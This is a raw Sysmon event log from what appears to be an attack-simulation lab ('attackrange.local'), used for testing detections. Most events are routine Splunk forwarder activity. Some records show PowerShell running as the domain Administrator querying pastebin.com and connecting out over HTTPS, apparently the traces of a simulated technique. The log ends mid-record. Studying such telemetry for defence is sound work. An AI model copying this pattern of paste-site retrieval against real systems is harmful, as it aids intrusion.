08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61884|C:\Windows\System32\SHELL32.dll+62820|C:\Windows\System32\TwinUI.dll+f54e1|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107245Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.678{58E9C193-AE68-615A-C800-00000000FC01}45485108C:\Windows\Explorer.EXE{58E9C193-B24B-615A-CB01-00000000FC01}712C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+f5319|C:\Windows\System32\TwinUI.dll+f5d4f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000107244Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.578{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F1CB56D79329D50C413D9084FCA100DC,SHA256=8FA5DFF6E8FCA71ABC989021069F6BBAB8BEBC786A63F063806A575E3161F46F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107243Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.478{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8EE9062DE7509FDBFC93FF64B539CDA,SHA256=AE59B39C9A40443F224FC8FE07CAD3A7524F79A735205ED4340B727128927D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083285Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:03.266{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BE6A1A57AEC11B6597335FED68150D9D,SHA256=7F95AC98A6DFE523FCB7FB0B498481DC69F8D97005F1B858E119A121280BE171,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000107242Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.462{58E9C193-B4BF-615A-5702-00000000FC01}74287336C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107241Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4BF-615A-5702-00000000FC01}7428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107240Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107239Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACA4-615A-0500-00000000FC01}4126816C:\Windows\system32\csrss.exe{58E9C193-B4BF-615A-5702-00000000FC01}7428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107238Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107237Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107236Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107235Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.246{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4BF-615A-5702-00000000FC01}7428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107234Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:03.247{58E9C193-B4BF-615A-5702-00000000FC01}7428C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107266Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:04.478{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4322D94BE6FD753CE892DC1C847ABBF8,SHA256=D4D04F98D19382B86925ADBE0C96D62696A7065E0BD4E07FF1A844670591A82E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083286Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:04.266{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8CAFE6BF33093EBCF65BB95FB4698645,SHA256=A3E6DF34124089ACFA48EDE2DB6FD8F9678806517AA4772353D1FDFA07EEB835,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107265Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:04.247{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3DE371D71E42B64D212E6057480CF0DF,SHA256=0AC7BD4FD50485BD8693C7B33090E90E5D8A4DD227644E21495E565E9AB3E211,IMPHASH=00000000000000000000000000000000falsetrue 22542200x8000000000000000107264Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.626{58E9C193-B4BD-615A-5202-00000000FC01}7260pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000107263Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.560{58E9C193-B4BD-615A-5402-00000000FC01}7280pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 22542200x8000000000000000107262Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.357{58E9C193-B4BD-615A-4E02-00000000FC01}6168pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x8000000000000000107261Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:04.146{58E9C193-B4BF-615A-5802-00000000FC01}76007760C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x8000000000000000107260Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.348{58E9C193-ACB4-615A-2D00-00000000FC01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-639.attackrange.local64427- 10341000x8000000000000000107279Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.530{58E9C193-ACB6-615A-3500-00000000FC01}32443264C:\Windows\system32\conhost.exe{58E9C193-B4C1-615A-5902-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107278Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.528{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107277Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.528{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107276Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.527{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107275Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.527{58E9C193-ACA7-615A-0C00-00000000FC01}8403804C:\Windows\system32\svchost.exe{58E9C193-ACB4-615A-2A00-00000000FC01}2108C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000107274Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.527{58E9C193-ACA4-615A-0500-00000000FC01}412428C:\Windows\system32\csrss.exe{58E9C193-B4C1-615A-5902-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000107273Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.527{58E9C193-ACB4-615A-2F00-00000000FC01}17123344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{58E9C193-B4C1-615A-5902-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000107272Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.526{58E9C193-B4C1-615A-5902-00000000FC01}1360C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{58E9C193-ACA5-615A-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{58E9C193-ACB4-615A-2F00-00000000FC01}1712C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000107271Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:05.493{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6E6B5128E83BF7B744FDAB385FB1A47A,SHA256=9F5EEF1367695259D5CCC4BB5424A6385A8BB63FF3BA523B6BB5EDE03B9AF012,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083288Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:05.266{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40F414A4F9F93A1E55F06A79696CEA5E,SHA256=F85E05535157AC1182E688760A4201F1DF5B82996245EC9B0DCC8038589E8968,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000107270Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.628{58E9C193-B4BD-615A-5202-00000000FC01}7260C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51875-false104.23.99.190-443https 354300x8000000000000000107269Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.558{58E9C193-B4BD-615A-5402-00000000FC01}7280C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51874-false104.23.99.190-443https 354300x8000000000000000107268Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.484{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51873-false10.0.1.12-8000- 354300x8000000000000000107267Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:02.356{58E9C193-B4BD-615A-4E02-00000000FC01}6168C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\Administratortcptruefalse10.0.1.14win-dc-639.attackrange.local51872-false104.23.99.190-443https 354300x800000000000000083287Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:03.633{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50152-false10.0.1.12-8000- 23542300x8000000000000000107281Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:06.561{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5463DB325CFE29AFE9EC49B9CBB49B40,SHA256=EFF427971B452029885D89D012D1BF0D2F300FC8EF638E95C563551AAD61D5BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107280Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:06.508{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CB1689BED31CAC6B90CCE09CE7AF209C,SHA256=7F43DB76A518CF1A746424FFEF56C21249E9C20872E82B65C4D3A97D64064F3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000083289Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 08:01:06.282{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=25E2F1B33A8CB615B6D34890DCE826FD,SHA256=D70A61287A03662783866827E50297A63D3CEEC6223DB292A81BA6FED7EC1BBB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000107282Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 08:01:07.526{58E9C193-ACC9-615A-7700-00000000FC01}2976NT 